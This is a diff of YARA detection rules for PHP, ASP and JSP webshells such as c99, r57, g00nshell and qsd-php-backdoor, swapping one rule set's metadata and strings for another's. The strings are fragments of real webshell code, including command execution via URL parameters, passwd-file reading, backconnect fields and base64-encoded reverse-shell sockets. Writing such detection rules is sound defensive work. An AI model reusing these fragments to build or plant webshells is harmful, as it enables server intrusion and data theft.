+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6343-L6358"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "422bc3a0d9b04b1e37ad954faacb1ec7841fe529c1eb19634bdbfe83da374c73"
+		hash = "42d837e9ab764e95ed11b8bd6c29699d13fe4c41"
+		logic_hash = "2af3bbe8d1940e60843f3f5d40c9c6550e76df21568c374f7a871f73aeefae44"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash5 = "09609851caa129e40b0d56e90dfc476c"
-		hash6 = "671cad517edd254352fe7e0c7c981c39"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "  if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\""
-		$s1 = "  if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile"
-		$s2 = "  echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr"
-		$s3 = "  elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m"
+		$s1 = "<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>" fullword
+		$s3 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\"; " fullword
+		$s6 = "$string = !empty($_POST['string']) ? $_POST['string'] : 0; " fullword
+		$s7 = "$tabledump .= \"CREATE TABLE $table (\\n\"; " fullword
+		$s14 = "echo \"<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE"
 
 	condition:
-		all of them
+		3 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_C99Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Webshell_Dc3_Security_Crew_Shell_Priv_2
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		description = "PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1d4a95c4-8128-504d-958f-dcc5c68f4975"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5105-L5122"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6359-L6374"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b133cf947476a1c94ed90b5cd3757ca8aa429be4284d75664625896d9cfa687f"
+		hash = "9077eb05f4ce19c31c93c2421430dd3068a37f17"
+		logic_hash = "52dc0449c205ff9105e2dedc3cb4858f83a2efc7bae579656a26da493dc59500"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash5 = "09609851caa129e40b0d56e90dfc476c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$sess_data[\"cut\"] = array(); c99_s"
-		$s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))"
+		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+		$s9 = "header(\"Last-Modified: \".date(\"r\",filemtime(__FILE__)));" fullword
+		$s13 = "header(\"Content-type: image/gif\");" fullword
+		$s14 = "@copy($file,$to) or die (\"[-]Error copying file!\");" fullword
+		$s20 = "if (isset($_GET['rename_all'])) {" fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_Wacking_Php_Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Webshell_Qsd_Php_Backdoor
 {
 	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "c01ad0e5-1aff-5128-9d0c-5d0967532a4b"
+		description = "PHP Webshells Github Archive - file qsd-php-backdoor.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f8208851-159c-5d0b-91ad-478aeb4fc9fd"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5123-L5137"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6375-L6389"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7bdaebfb093b58a2fd33b4bbeea8465d0f724383b4855eb521a3e339ee153781"
+		hash = "4856bce45fc5b3f938d8125f7cdd35a8bbae380f"
+		logic_hash = "3ef7b67cd60370a99fdfa6fd614f71ee314af27c9d983383dde8f03a127a28b3"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash2 = "09609851caa129e40b0d56e90dfc476c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
-		$s2 = "c99sh_sqlquery"
+		$s1 = "// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c"
+		$s2 = "if(isset($_POST[\"newcontent\"]))" fullword
+		$s3 = "foreach($parts as $val)//Assemble the path back together" fullword
+		$s7 = "$_POST[\"newcontent\"]=urldecode(base64_decode($_POST[\"newcontent\"]));" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_Sses_Php_Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Spygrup
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ee1fd555-f1bc-59a5-998c-f6098de8623e"
+		description = "PHP Webshells Github Archive - file spygrup.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5138-L5154"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6390-L6404"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6dbd40e19d4d5753dbd1f7e627bccc08a60430de8138a923f13e836d19dde65c"
+		hash = "12f9105332f5dc5d6360a26706cd79afa07fe004"
+		logic_hash = "5981f8cc1a98f799b1573cf73297383f995acf1c40f0227ac10302dc4d6fd6cc"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA"
-		$s3 = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec"
+		$s2 = "kingdefacer@msn.com</FONT></CENTER></B>\");" fullword
+		$s6 = "if($_POST['root']) $root = $_POST['root'];" fullword
+		$s12 = "\".htmlspecialchars($file).\" Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>" fullword
+		$s18 = "By KingDefacer From Spygrup.org>" fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_Sniper_SA_Shell_Php_R57_Php_Php_Spy_Php_Php_S_Php_Php
+rule SIGNATURE_BASE_Webshell_Web_Shell__C_Shankar
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "44b53124-c8b6-545b-819f-77fd65e5d61b"
+		description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "966f5580-21c5-5ecf-b500-bde3d1ba4494"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5155-L5171"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6405-L6419"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "834c33059e08e8075a8d3f69187b74f3b53afabfc37ae1f13a2f579f0948a363"
+		hash = "3dd4f25bd132beb59d2ae0c813373c9ea20e1b7a"
+		logic_hash = "9d320eed18a5d76a87cee4ea0fa9caf08f096f7eeaab55420540aa082b596e0f"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "911195a9b7c010f61b66439d9048f400"
-		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash4 = "817671e1bdc85e04cc3440bbd9288800"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo sr(15,\"<b>\".$lang[$language.'_text"
-		$s1 = ".$arrow.\"</b>\",in('text','"
+		$s0 = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword
+		$s5 = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump"
+		$s6 = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword
+		$s12 = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_Sniper_SA_Shell_Php_R57_Php_Php
+rule SIGNATURE_BASE_Webshell_Ayyildiz_Tim___AYT__Shell_V_2_1_Biz
 {
 	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "44b53124-c8b6-545b-819f-77fd65e5d61b"
+		description = "PHP Webshells Github Archive - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fdd9bae9-80f3-5200-b922-e7d194009af8"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5172-L5187"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6420-L6434"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f97846fdaac949185b4ce6a25cc276f4ae4243d891acb18c3a3ce0c18b540976"
+		hash = "5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68"
+		logic_hash = "2d096baad162c0e3e01732007a3be2804155e614a8fa4cd2d5dd3a7ac808fb49"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "911195a9b7c010f61b66439d9048f400"
-		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword
-		$s1 = "$name='ec371748dc2da624b35a4f8f685dd122'"
-		$s2 = "rst.void.ru"
+		$s7 = "<meta name=\"Copyright\" content=TouCh By iJOo\">" fullword
+		$s11 = "directory... Trust me - it works :-) */" fullword
+		$s15 = "/* ls looks much better with ' -F', IMHO. */" fullword
+		$s16 = "} else if ($command == 'ls') {" fullword
 
 	condition:
 		3 of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_R57_Shell_Php_Php_Spy_Php_Php_S_Php_Php
+rule SIGNATURE_BASE_Webshell_Gamma_Web_Shell
 {
 	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "7a31b923-15e5-5af4-9ad0-8d261fedf7c4"
+		description = "PHP Webshells Github Archive - file Gamma Web Shell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "43b4fc9f-8897-5553-8846-29d307efa885"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5188-L5204"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6435-L6449"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "764a374c1e4acec8978db1e7e7e326c4fa95c6f92e1ca5a6d7f892bb05ecd289"
+		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
+		logic_hash = "1de868c4948a95272d288aeba3ac38b84bf6b33ede6b3b600b32530c85586404"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "8023394542cddf8aee5dec6072ed02b5"
-		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash3 = "817671e1bdc85e04cc3440bbd9288800"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo ws(2).$lb.\" <a"
-		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']"
-		$s3 = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l"
+		$s4 = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" fullword
+		$s8 = "### Gamma Group <http://www.gammacenter.com>" fullword
+		$s15 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword
+		$s20 = "my $command = $self->query('command');" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE__Wacking_Php_Php_1_Specialshell_99_Php_Php_C100_Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Aspydrv
 {
 	meta:
-		description = "Semi-Auto-generated  - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "3dac5550-598a-5a0f-95c3-2e0162a686ee"
+		description = "PHP Webshells Github Archive - file aspydrv.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5205-L5221"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6450-L6465"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d32fc00ba2602a1140dc9030894bb9524c55b95c445a08f2bf6f8fc60108e64"
+		hash = "3d8996b625025dc549d73cdb3e5fa678ab35d32a"
+		logic_hash = "314fd671b163b9904cc78cb3a5858f5b1e3dfae9d520d5ebc545a7abd922e9f7"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash1 = "44542e5c3e9790815c49d5f9beffbbf2"
-		hash2 = "09609851caa129e40b0d56e90dfc476c"
-		hash3 = "38fd7e45f9c11a37463c3ded1c76af4c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(eregi(\"./shbd $por\",$scan))"
-		$s1 = "$_POST['backconnectip']"
-		$s2 = "$_POST['backcconnmsg']"
+		$s0 = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\"  ' ---Directory to which files"
+		$s1 = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword
+		$s3 = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword
+		$s17 = "If request.querystring(\"getDRVs\")=\"@\" then" fullword
+		$s20 = "' ---Copy Too Folder routine Start" fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_R57_Php_Php_R57_Shell_Php_Php_Spy_Php_Php_S_Php_Php
+rule SIGNATURE_BASE_Webshell_Jspwebshell_1_2_2
 {
 	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "093892f6-ff53-5bd1-b7b2-fea21a9258aa"
+		description = "PHP Webshells Github Archive - file JspWebshell 1.2.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "659f5c7d-0a9c-554d-a0ad-e3bcb8c5a1e9"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5222-L5239"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6466-L6481"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "afbd2103b0c953d6aec070ba450f43e567560bc9743423a5731cd4d6e5e36bb6"
+		hash = "184fc72b51d1429c44a4c8de43081e00967cf86b"
+		logic_hash = "41d937fce969a850a2e4e07eb168becc96a036317a78d620e812707be9466dfc"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash2 = "8023394542cddf8aee5dec6072ed02b5"
-		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash4 = "817671e1bdc85e04cc3440bbd9288800"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if(rmdir($_POST['mk_name']))"
-		$s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>"
-		$s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell"
+		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
+		$s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword
+		$s15 = "endPoint=random1.getFilePointer();" fullword
+		$s20 = "if (request.getParameter(\"command\") != null) {" fullword
 
 	condition:
-		2 of them
+		3 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_Wacking_Php_Php_Sses_Php_Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Webshell_G00Nshell_V1_3
 {
 	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "81480945-b684-50b6-9431-4ab7a786b214"
+		description = "PHP Webshells Github Archive - file g00nshell-v1.3.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "61a09576-7e62-5a30-a52c-492b81b96322"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5240-L5256"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6482-L6497"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9bbcb687c83c01ad52e8978a60e604a74f10c33a63af3b91d0286b30dea42890"
+		hash = "70fe072e120249c9e2f0a8e9019f984aea84a504"
+		logic_hash = "2ecb3ce2aa43a99552fb26e610c35bdb04f4ff0dc75c867e4327d6e27eed0177"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-		hash3 = "09609851caa129e40b0d56e90dfc476c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi"
-		$s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu"
-		$s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd"
+		$s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword
+		$s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword
+		$s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword
+		$s17 = "echo(\"<form method='GET' name='shell'>\");" fullword
+		$s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Multiple_Php_Webshells
+rule SIGNATURE_BASE_Webshell_Winx_Shell_2
 {
 	meta:
-		description = "Semi-Auto-generated  - from files multiple_php_webshells"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		description = "PHP Webshells Github Archive - file WinX Shell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ebad4f2e-96c3-5cb7-b228-de3a6a39ae55"
 		date = "2025-03-29"
 		modified = "2025-03-29"
+		old_rule_name = "WebShell_WinX_Shell"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5258-L5279"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6498-L6514"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d55c96febd64107273001edadbda6d0a1b4b00e35fb41b46561b49fca6a9bd1b"
+		hash = "a94d65c168344ad9fa406d219bdf60150c02010e"
+		logic_hash = "f953c297763e41d197ce186dc818b656951dfa8c855c5063fc4abb54eeefc7bb"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "911195a9b7c010f61b66439d9048f400"
-		hash2 = "be0f67f3e995517d18859ed57b4b4389"
-		hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash4 = "8023394542cddf8aee5dec6072ed02b5"
-		hash5 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash6 = "817671e1bdc85e04cc3440bbd9288800"
-		hash7 = "7101fe72421402029e2629f3aaed6de7"
-		hash8 = "f618f41f7ebeb5e5076986a66593afd1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
-		$s2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0"
-		$s4 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg"
+		$s4 = "// It's simple shell for all Win OS." fullword
+		$s5 = "//------- [netstat -an] and [ipconfig] and [tasklist] ------------" fullword
+		$s6 = "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>" fullword
+		$s13 = "// Created by greenwood from n57" fullword
+		$s20 = " if (is_uploaded_file($userfile)) {" fullword
 
 	condition:
-		2 of them
+		3 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php
+rule SIGNATURE_BASE_Webshell_PHANTASMA
 {
 	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ee1fd555-f1bc-59a5-998c-f6098de8623e"
+		description = "PHP Webshells Github Archive - file PHANTASMA.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b36a7dbb-7d40-5fca-8409-c8822298005c"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5280-L5295"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6515-L6529"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c089f8175532ddc0e2d256b4972f7db32683bd213a456622ed27ab4844d1e435"
+		hash = "cd12d42abf854cd34ff9e93a80d464620af6d75e"
+		logic_hash = "355be62807182f9a53bac20a6dead8f0a3bee83b6bdc4566502c157f16076b9b"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<b>Dumped! Dump has been writed to "
-		$s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st"
-		$s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive"
+		$s12 = "\"    printf(\\\"Usage: %s [Host] <port>\\\\n\\\", argv[0]);\\n\" ." fullword
+		$s15 = "if ($portscan != \"\") {" fullword
+		$s16 = "echo \"<br>Banner: $get <br><br>\";" fullword
+		$s20 = "$dono = get_current_user( );" fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_C99Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Cw
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		description = "PHP Webshells Github Archive - file cw.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
